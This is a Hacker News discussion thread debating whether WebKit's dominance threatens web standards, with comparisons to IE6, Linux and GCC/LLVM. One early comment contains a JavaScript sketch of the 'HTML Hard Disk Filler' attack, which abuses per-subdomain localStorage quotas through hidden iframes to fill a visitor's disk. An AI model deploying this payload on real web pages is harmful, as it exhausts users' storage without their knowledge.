Fear of a WebKit Planet (hypercritical.co)
120 points by orofino on March 4, 2013 | 62 comments



"Consider all the embedded applications of WebKit, from game consoles to theme-park kiosks, and the idea of a homogenous, stagnating WebKit monoculture seems even more unlikely."

This is attacking a straw man. I'm not worried that WebKit isn't going to continue to improve. I'm more worried that WebKit is going to dominate so much that WebKit's implementation quirks result in de facto standards. Take the HTML Hard Disk Filler from a few days ago: the reason that WebKit can change to fix that bug is that the Web doesn't depend on the semantics that WebKit implemented. If Web sites relied on subdomains' quota not counting toward the parent domain's quota, as WebKit implemented (contrary to the recommendations of the spec), then that security issue would be much harder to fix without breaking sites.
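
For anyone unfamiliar with the mechanics: each origin gets its own localStorage quota (a few megabytes, depending on the browser), and affected WebKit builds treated every subdomain as a fresh origin whose storage didn't count toward the parent domain. A rough sketch of the attack in plain JavaScript, with a hypothetical attacker-controlled example.com standing in - illustrative only, not the actual exploit code:

  // fill.html, served from 1.example.com, 2.example.com, etc.
  var chunk = new Array(1024 * 1024).join('x'); // ~1 MB of junk
  try {
    for (var i = 0; ; i++) {
      // setItem throws once this origin's quota is exhausted
      localStorage.setItem('filler-' + i, chunk);
    }
  } catch (e) {
    parent.postMessage('full', '*'); // tell the parent to move on
  }

  // Parent page: every numbered subdomain gets a brand-new quota,
  // so keep loading them until the disk fills up.
  var n = 0;
  function next() {
    var frame = document.createElement('iframe');
    frame.style.display = 'none';
    frame.src = 'http://' + (n++) + '.example.com/fill.html';
    document.body.appendChild(frame);
  }
  window.addEventListener('message', next, false);
  next();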

"The proliferation of WebKit will be a rising tide that lifts all boats."

Assuming that no better engine comes along. If the Web starts to depend on WebKit's implementation, then the Web will basically be defined by this large pile of C++ code, presumably in perpetuity. That might be better in the short term, but it doesn't seem like a good long-term bet.


The concept of "WebKit's implementation quirks" implies that WebKit is a single thing when in fact it's (already) a hugely diverse collection of different things.

http://paulirish.com/2013/webkit-for-developers/

WebKit is also constantly changing, so even the current (small) set of "implementation quirks" that really are 100% identical in all products that use WebKit will not stay the same very long.


The HTML Hard Disk Filler bug was (and still is) present in all versions of WebKit.


Let’s check back in a year. I don't share the fear of WebKit bugs that are present in every single implementation of WebKit in use today (I'm not even sure the disk filler qualifies) and that "can't be fixed because they'll break the web." Individual products that incorporate WebKit can and will choose how much bug-for-bug compatibility to maintain with each new version, and I don't think those decisions will all match up.


Have you never seen someone comment "Gingerbread is the new IE6"? What do you think that means in terms of bug-for-bug compatibility?


Having spent the mid-2000s through late 2010 doing mostly web development that had to support IE6 and IE7, and presently doing more Android development, I would gladly take Android 2.3 over IE6 or even IE7 any day.

Microsoft provided no compatibility library or ease-of-use tooling for IE6/7, while Android's support library makes it really easy to backport, along with third-party tools like ActionBarSherlock and HoloEverywhere. The only thing really missing is going back to 2.2 (with the download API), and that's now < 10% of the market share.

In short, people who claim Gingerbread is the new IE6 are either ignorant of the Android development process or mostly spreading FUD. I'm not the only developer out there who agrees [1]. The biggest hassle is really the various DPIs and resolutions, and having to provide resources for 3-4 density buckets [2] (depending on what one supports), though one has to do that for iOS as well to a point. Nothing under 480x800 really matters if one is targeting 2.2+.

[1] http://getmoai.com/blog/android-fragmentation-maybe-not-such...

[2] http://developer.android.com/guide/practices/screens_support...


I think fpgeek was referring to the Gingerbread browser and making sure web sites are compatible with it, not application development.


I thought about that being what he was alluding to, but that's not just a Gingerbread phenomenon, so I figured he was talking about native apps. Even on Android 4.0, the stock browser stays static unless there's an OS upgrade. It would be cherry-picking to single out Android 2.3 in that case, when every Android OS version's stock browser (outside of those that come with Chrome) is dependent on the OS version. Tying the browser to the OS was just a bad idea after seeing how that went with IE. If he's referring to Chrome only working on ICS+, that's true, but not every ICS+ device comes with it (very few do), so most people won't bother getting it any more than they would look for an alternative browser on Android 2.3.

I haven't used iOS enough to say for sure, but isn't Mobile Safari also tied to the OS version in a similar way, unable to get updates without the OS being updated?


It isn't just a Gingerbread phenomenon, but Gingerbread is one of the most obvious examples of the phenomenon. It looks like half of all "active" Android devices are running Gingerbread or earlier [1], and many of those devices will never have an OS update released. It happens with iOS too, but devices generally get updates for two years before they're stranded.

But you are correct--it is far from the only example. There are major problems with iOS's model, too--once your device has received its last update, you're stuck with its rendering engine forever! Browsers using alternate rendering engines aren't allowed in the store. With Gingerbread, at least people can install a browser with a newer rendering engine.

But in general, I think the "Gingerbread is the new IE6" claims are pretty hyperbolic. IE6 remained such a scourge because so many companies wouldn't upgrade it to maintain consistency and compatibility with their custom, non-standards-compliant internal web applications. In contrast, mobile devices currently aren't kept very long, and there's quick iteration. After a few years, those Gingerbread users still using their devices can get a new browser if they're insistent on using the device, and idevice users will have to get a new idevice. But those users won't be tied to using those devices by corporate policy. At worst, I think developers will have to worry about the Gingerbread browser and older versions of mobile Safari for a few years, not the better part of a decade like with IE6.

[1] https://developer.android.com/about/dashboards/index.html


> I haven’t forgotten the past. A single, crappy web browser coming to dominate the market would be just as terrible today as it was in the dark days of IE6. But WebKit is not a browser. Like Linux, it’s an enabling technology. Like Linux, it’s free, open-source, and therefore beyond the control of any single entity.

This seems very arbitrary. So WebKit isn't a "browser". Is the author saying that a monoculture at another level is ok, but the "browser" level is somehow special and we want to keep diversity there? No, I think we need diversity at all levels.

Speaking of Linux, which is the main example in the article - yes, if Linux were to become completely dominant, that would be a bad thing, even if the author calls it an "enabling technology" and is somehow ok with a monoculture there. I am a huge Linux supporter - I am running on Linux right now, my desktop has been Linux for many, many years, and I encourage people to switch to it and abandon proprietary OSes like Windows and OS X - but we still don't want Linux to dominate the OS kernel space.

Thankfully Linux is not doing that. It might dominate the open source kernel space, but there are still Windows Server and OS X Server. And applications written portably can often run on all of those.

Linux is a great kernel, but it has downsides like any software. If everything ran Linux, it would be very, very hard to invent something better than Linux and get adoption for that new thing. The same is true of WebKit.


It's not an arbitrary distinction. I see a continuum between products and "infrastructure technologies," and I think it's increasingly reasonable (and, eventually, desirable) for there to be more collaboration on a single, shared project (and less wheel reinvention) as we move toward the infrastructure end of the spectrum.

None of this precludes a changing of the guard in the future. Just ask the gcc guys about egcs and llvm…


LLVM is still fighting GCCisms. (They even had to implement a subset of GCC RTL to compile the inline asm!) The sheer amount of effort they had to go through in order to compile, say, Linux, is incredible.

Besides, by your argument, LLVM should never have been started, because they should have contributed to GCC. Yet I'm very glad they did, because LLVM is much more hackable and this flexibility has enabled many new projects, like Emscripten and llvmpipe.


That's not my argument. It's a cycle. People tried to contribute to gcc, but eventually reached some limits (real or imagined, it doesn't matter) and created something new. egcs was another, similar crisis with a slightly different outcome. This is all part of the process. It's never easy, but progress is made. And we all enjoy nice things between the big upheavals.


The limits reached are very real. The technical problems are quite fundamental and serious, but possibly fixable. But the political problems make it impossible to solve these technical ones.

See Chandler Carruth's talk "Clang: Defending C++ from Murphy's Million Monkeys". At the beginning between 2:20 and 4:00, he quotes Richard Stallman's response to their proposed changes and demonstrates that using gcc is a non-starter.

http://channel9.msdn.com/Events/GoingNative/GoingNative-2012...


And, most importantly, they are finally providing GCC some *desperately* needed competition.


  | LLVM is still fighting GCCisms
And yet this doesn't affect everything. Didn't Apple switch from gcc to the Intel C compiler? Does the Intel C compiler implement all of gcc's quirks?


Apple switched to LLVM from GCC. Chris Lattner, LLVM's primary author, works for Apple.


IIRC, there was talk of Apple switching to the Intel C compiler around a year or so after the Intel switch. I'm not an Apple dev, so I don't have first-hand knowledge.


No. I am an Apple dev. At least publicly, this never happened.

But Intel did have a presence at WWDC when the Intel switch announcement was made. Intel was trying to sell developers licenses to the Intel compiler (as they should).


Of course it doesn't affect everything, nor does it make anything 100% impossible. It just makes it potentially much harder.

A huge corporation like Apple will typically be able to overcome the additional effort.


> None of this precludes a changing of the guard in the future. Just ask the gcc guys about egcs and llvm…

By all means, ask the LLVM people about all the work they had to do to overcome the single-implementation status of gcc. clang must support gcc's arguments and behavior very carefully, and still cannot build all open source projects, simply because so many open source projects - including the Linux kernel, btw! - have been designed with only gcc in mind.

LLVM managed to overcome that through a lot of effort. LLVM is funded by Apple, a massive multinational and one of the largest tech companies of all time. Not all new projects have that luxury. In an ideal world, you wouldn't need those kinds of resources to challenge an existing implementation.


LLVM was created by one person, just like Linux. Both projects would not be where they are today without the efforts and monetary contributions of many others, including corporations. These are examples of the system working, IMO. Giants can be felled, tools and infrastructure can be improved for all.


If by "working" you mean Linux succeeding through huge amounts of funding from IBM and others, and LLVM through huge amounts of funding from Apple and others, then sure. Yes, both were founded by one person, but that is highly irrelevant here.

Both of your examples clearly show that it takes huge resources to overcome a single implementation in a field. That is far from optimal: it means the barrier is so high that innovation is being stifled.

As another example, look at the single-implementation status of Microsoft Office. Despite huge investments and efforts by multiple parties in the industry, it remains essentially unassailable.

The best way to avoid that is to not have a single implementation, but rather to have standards, and to have good open source implementations of those standards.


> Both of your examples clearly show that it takes huge resources to overcome a single implementation in a field. That is far from optimal: it means the barrier is so high that innovation is being stifled.

I think it's more optimal than the alternatives tried so far. You're ignoring the "period of peace" between upheavals during which (almost) the whole world is working together to make something better for everyone. That more than makes up for the difficulty of dethroning (or forking) the king when needed.

Office is a closed-source product controlled by a single company, not analogous at all to WebKit.


I don't disagree that there is a benefit to a monoculture as well. It does avoid redundant effort.

But the cost is quite high.

10 implementations might be a lot of overhead. But a monoculture of 1 is too little. 2 or 3 might be an optimal number.


We already have two or three powerful entities working on WebKit, pulling it in whatever directions suit their needs. If they ever pull hard enough or far enough in different directions, it could tear (fork) and the cycle begins again. And anyone is free to learn from WebKit and create something better (as Apple learned from Gecko before adopting KHTML).

"Monoculture" is a loaded word. The differing priorities that might manifest in completely separate web rendering engines still have plenty of room to manifest when multiple big players are working on WebKit, with nothing stopping any of them from forking if the differences get too large.

(And anyway, Gecko does still exist, after all…)


With a very optimistic outlook like yours, there is nothing to worry about: Everything will work out, these are just cycles in the industry. What could go wrong?

But we already see problems today from WebKit's dominance on mobile. Non-WebKit browsers have trouble rendering the mobile web, which was designed with only WebKit in mind. It got so bad that Opera just gave up and adopted Chromium (not even just WebKit).

The remaining non-WebKit browsers, IE and Firefox, are left with an even bigger problem and it is even harder for them to disrupt the WebKit mobile web. And it would be even harder for a completely new engine.

So general arguments about cycles and all that might sound good, but we already see the damaging effects of a WebKit monoculture (you argue it's a loaded word, but it fits).


I'd say we already see the benefits of having so many people work together on WebKit. Would we be better off if Google had to create and maintain its own desktop and mobile web rendering engine from scratch? If there's a monoculture problem in mobile web browsing, it's due to the disproportionately large percentage of it that's done using Mobile Safari on iOS. Single-vendor/closed-platform will always be a problem. WebKit is neither.

Yes, over-use of vendor prefixes in CSS and other browser-specific features is bad. But that's an authoring issue as much as it's a WebKit issue. Having -moz-, -o-, and -webkit-* plus JavaScript shims to hide the differences in multiple browsers is a great argument for standards, but not a great argument for a larger variety of independently developed and maintained web rendering engines.
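
To make the "shims" point concrete, this is the kind of boilerplate pages shipped at the time - a sketch in the style of the well-known requestAnimationFrame polyfill, using the prefixed names the various engines actually exposed:

  // Paper over vendor prefixes so page code can call the
  // standard name regardless of the underlying engine.
  window.requestAnimationFrame =
    window.requestAnimationFrame ||
    window.webkitRequestAnimationFrame || // WebKit (Safari, Chrome)
    window.mozRequestAnimationFrame ||    // Gecko (Firefox)
    window.oRequestAnimationFrame ||      // Presto (Opera)
    window.msRequestAnimationFrame ||     // Trident (IE)
    function (callback) {                 // last-ditch fallback
      return window.setTimeout(function () {
        callback(Date.now());
      }, 1000 / 60);
    };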


> I'd say we already see the benefits of having so many people work together on WebKit.

Of course, as I already agreed before. There are benefits to centralization.

It's a question of degree, not absolutes. As I said, 10 or 100 might be too many rendering engines, while 1 is too few. 2 or 3 seems, to me, to be optimal, but again this is a matter of degree so others may prefer a little more or less.

> Yes, over-use of vendor prefixes in CSS and other browser-specific features is bad. But that's an authoring issue as much as it's a WebKit issue. Having -moz-, -o-, and -webkit-* plus JavaScript shims to hide the differences in multiple browsers is a great argument for standards, but not a great argument for a larger variety of independently developed and maintained web rendering engines.

Agreed, this is not just a WebKit monoculture issue - plenty of other problems in that area as well, as you say.


In general, I agree with you. But in this specific case, we may not be able to extrapolate Linux's and LLVM's success to the web. Yes, you can create a toy kernel for yourself. You don't have to be POSIX-compliant from day one, or run OS/2 apps, or whatever. And you can create a more standard compiler that's not capable of compiling most programs that use gcc's esoteric features. They can have little niches for years, and slowly gain traction (from end-users and also developers).

But I don't think that you can do the same in browser space. If you want to create a new rendering engine, it absolutely, positively has to render 95+% of most-visited websites from early stages of development (before you "ship" a browser). Nobody would use a half-baked browser that's unable to render most websites. So, you have to also support WebKit's bugs-turned-into-standards.

In other words, you don't compile 500 different programs in a single day - if LLVM can compile the one program that your company is developing faster and better, it's a good fit for you. But you visit hundreds of websites a day. If a new engine can't display even 10% of them correctly, it'd be a showstopper.

So, your choices are to either fork WebKit, or create a new engine that "simulates" most mainstream WebKit engines. Both result in WebKit becoming more and more of a standard.


As someone who (peripherally) lived through the gcc/egcs schism, I'd certainly love to hear their perspective on open-source monoculture. Somehow I don't think it would be nearly as monoculture-friendly as yours.


> Like Linux, it’s an enabling technology. Like Linux, it’s free, open-source, and therefore beyond the control of any single entity.

As SQLite3 is.

Bring back WebDB!


A Linux monoculture is never going to happen. But what would actually be wrong with it?


As I said, it means that code would be written to Linux specifically. What works on Linux, what is fast on Linux, etc., would be what people write to.

So if someone invented a new kernel that is better than Linux, it would have two problems: the usual problem of getting adoption and interest in a new project, but also the problem of all existing code being designed with Linux in mind.

Whereas today, people generally try to write code that runs well not just on Linux but also on other kernels. Not necessarily because they have lofty ideals, but because there are other kernels.

If we had only Linux, that wouldn't be the case.

This is the basic question of standards. Open source is great - as I said above, I have been a huge supporter for a very long time - but standards are an orthogonal issue to open source, and just as important. Writing to standards instead of the bugs/idiosyncrasies of a single implementation is the only thing that makes it easy for new implementations to show up. And standards are dead when there is a single implementation.


A Minix monoculture never happened. But what would actually have been wrong with it?

Think of all of Tanenbaum's design decisions that Linus ended up changing. One big reason we know, in detail, what would have been wrong with a Minix monoculture is that it never happened.


Assuming that Minix adopted a reasonable license and fixed outstanding issues that make Linux currently better, I'm asking you to tell me what's wrong with that. We have a de facto monoculture of Windows on the PC right now and I don't think that's better.


I didn't say what sort of Minix monoculture we might have wound up with. In particular, who says the licensing would have been fixed? Without Linux's success how many people would have thought there was a problem?


"As someone whose memory of perceived past technological betrayals and injustices is so keen that I still find myself unwilling to have a Microsoft game console in the house..."

I wonder how many war refugees from that era feel the same way. I won an Xbox and gave it away to charity because I didn't want it in my house either.


I certainly do feel that way.

The market has handed Microsoft several monopolies. Many times they've squandered those opportunities, leaving a bunch of pissed off customers in their wake.

I don't really see any evidence that anything has changed recently at Redmond.


I wouldn't go that far; I have an Xbox and Windows. But I always feel a little dirty when I buy anything from Microsoft, and if I end up liking it I feel a little guilty for liking it.


There's something to be said here about the constituents of the WebKit project compared to those of kernel.org.

Somehow I feel secure knowing someone like Linus is in charge. Maybe because the Linux project isn't maintained by people whose ultimate goal is profit?


Wouldn't monocultures be susceptible to the innovator's dilemma? Consider if WebKit, or Linux, hypothetically became completely dominant. It would eventually collapse under its own weight and become bloated. If a rising new kernel or rendering engine is sufficiently better than the dominant "standard", then it could become a real challenger to it. From a very superficial perspective, I view the growth of Chrome at the expense of Firefox as such a phenomenon.


I fear that you are allowing your memory of the past to cloud your judgment of the present. I steadfastly resisted IE even in the days of IE 4, when it was clearly superior to Netscape 4. When Microsoft allowed IE to go dormant, my hatred for it blossomed in the same manner that affected many of us here. And today, I will freely admit that I retain leftover bitterness about Internet Explorer. I remain absolutely committed to the Mozilla cause as a result.

And yet I acknowledge that I am closed-minded in my religious support of Mozilla. I have had my bouts of doubt, and most recently wrote about my awe over Microsoft's IE 10 benchmarks [1]. Obviously I want to rationalize the benchmarks as tilted toward IE, but to be honest with myself, I have to admit that IE 10's performance--rendering performance in particular--is quite shocking.

Observing the hardware acceleration of IE 10 on my i7 3770K with a discrete nVidia GPU fills me with regret that I cannot stomach the use of Internet Explorer. I know I am squandering CPU and GPU cycles using a browser that is decidedly less efficient. And simply because I am familiar with my favorite browser's UI and because I like its particular quirks more than the other guy's quirks.

Here is how I rationalize my behavior, though: I love that Mozilla has two competitors. I love that they are being motivated to continuously improve their hardware acceleration (among other things) by attacks on two fronts. I'd like even more competition, but two major competitors will suffice. I feel that the good-natured rivalry between the three major teams is a very good thing.

My fear is that without a sufficiently wide field of competitors, certain areas of innovation will shrivel away. As evidenced by the IE 10 benchmarks, especially those related to hardware acceleration, both Mozilla and Apple/Google have not, to date, made hardware acceleration a priority. At least not on the desktop, which is where I do most of my web consumption.

I am hopeful that IE 10's kick in the rear will give them a little incentive to snap out of their complacency. I would love a Firefox build with the hardware accelerated rendering performance of IE 10.

I'm not worried about a monoculture in the sense that the particular rendering quirks of WebKit will be deemed the Holy Standard of the Web. To a degree, that's already the case, at least on mobile. As regrettable as that is, it's not my particular worry. Rather, I am worried about a monoculture because it inevitably reduces innovation, oftentimes in subtle ways that aren't immediately obvious and that we may not be able to perceive because the alternate possible course of history is closed off.

If Microsoft were not pushing the hardware acceleration envelope, evidently no one would be. (Actually, to be clear, we'd simply accept the degree to which Google, Apple, and Mozilla are focused on hardware acceleration to be a reasonable degree of focus, because there would be no counter-example available.) And we would probably all consider the rendering performance of Chrome and Firefox to be good enough. "Good enough" sucks, as I have ranted at length about elsewhere. Good enough is one of the worst sentiments in technology.

No, it's absolutely not good enough that the background animation of my blog causes lesser computers to bog down to a crawl (go ahead, take a look and post your complaints). It should not be so computationally intensive to do relatively trivial SVG/SMIL animation in a browser. (Irony: IE 10 doesn't support SMIL, so I can't vouch for its ability to animate my background; what I do know is that it makes the section navigation animation look absolutely effortless compared to Chrome and Firefox.)

I fear the loss of competition because of what that means for innovation. It entrenches "good enough," and I hate that.

[1] http://tiamat.tsotech.com/lets-all-use-webkit


With respect to IE 10 performance, Microsoft only has to worry about one platform (debatably two, if you want to count Win8 on ARM).

  | I fear the loss of competition because of what
  | that means for innovation. It entrenches "good
  | enough," and I hate that.
Being Open Source gives us a leg-up over the IE monoculture era. People with the willingness can improve it; fork it if necessary.


Can we please always try to remember that before the scourge that was IE, we had the scourge that was Netscape? If you go back and read through the W3C mailing lists, people really, really hated Netscape - the by-far dominant web browser at the time, for which books on HTML would have sections dedicated to optimizing, and which some would even go so far as to say it was fine to target exclusively - for seemingly making up HTML as they went along (almost all of the stuff in HTML that is deprecated, including all of the markup that was for style and presentation only, began as Netscape-only extensions) and refusing to take up the charge of CSS. Microsoft was even occasionally described as the potential savior that would come in with a second implementation that paid attention to the W3C (and in fact you then find a ton of praise on the list for Microsoft publishing open DTDs for IE).


Firefox has very similar hardware acceleration to IE. The IE demos are often constructed to expose optimizations that IE does and other browsers don't [1].

[1] http://robert.ocallahan.org/2011/03/investigating-performanc...


I think it's unlikely that the current state of things will fall into stagnation. Firefox, for instance, still uses Gecko, which is open source too.


True. Unfortunately, Gecko doesn't have the weight behind it that WebKit has, and most contributions to Gecko stem from Mozilla itself. Slightly off-topic: since a customer doesn't care what rendering engine they are using, I believe Mozilla is making a mistake by not releasing a WebView-based Firefox browser for iOS (like Chrome did), if only to provide tabs/bookmarks syncing.


This is a great article. I think a lot of people are assuming that WebKit plays a much bigger role in browsers than it really does.


Something people often seem to miss is that if everyone switches to building their browsers with WebKit, then if you come up with a better engine, you have immediately leapfrogged all of the competition at once.

Servo, I am looking at you.


You can't leapfrog the competition if rendering modern websites requires implementing the competition's feature set bug-for-bug at near 100% levels. Remember IE and Netscape?


Remember Chrome?


"Linux is the canonical open source success story"

Couldn't help but pause and reread that.


There has been a browser available for free for over 13 years for anyone to take. It comes from a little foundation called Mozilla. WebKit is not novel here.


If the success of WebKit is analogous to the success of Linux, does that mean we can expect a "WebKit Standard Base" in a few years?


This. "The proliferation of WebKit will be a rising tide that lifts all boats."


> Linux solved the Unix problem—for everyone.

Uhm... not exactly.


Fear is irrational.


That is certainly not the case in general. There are a lot of things people don't do because they fear the consequences, and for good reason. E.g. why do I not swerve my car into oncoming traffic? Why not quit my job and play videogames all day? Why not do any number of foolish things? Because of fear.

"A man who has no fear has lost a friend."


"A man who has no fear has lost a friend."

I like that quote, where's it from? My google-fu can't find anything like it.


I'm pretty sure it's in either Name of the Wind or Wise Man's Fear, but damned if I can find it. I sure as hell didn't come up with such a good quote myself.


Except when it's justified.



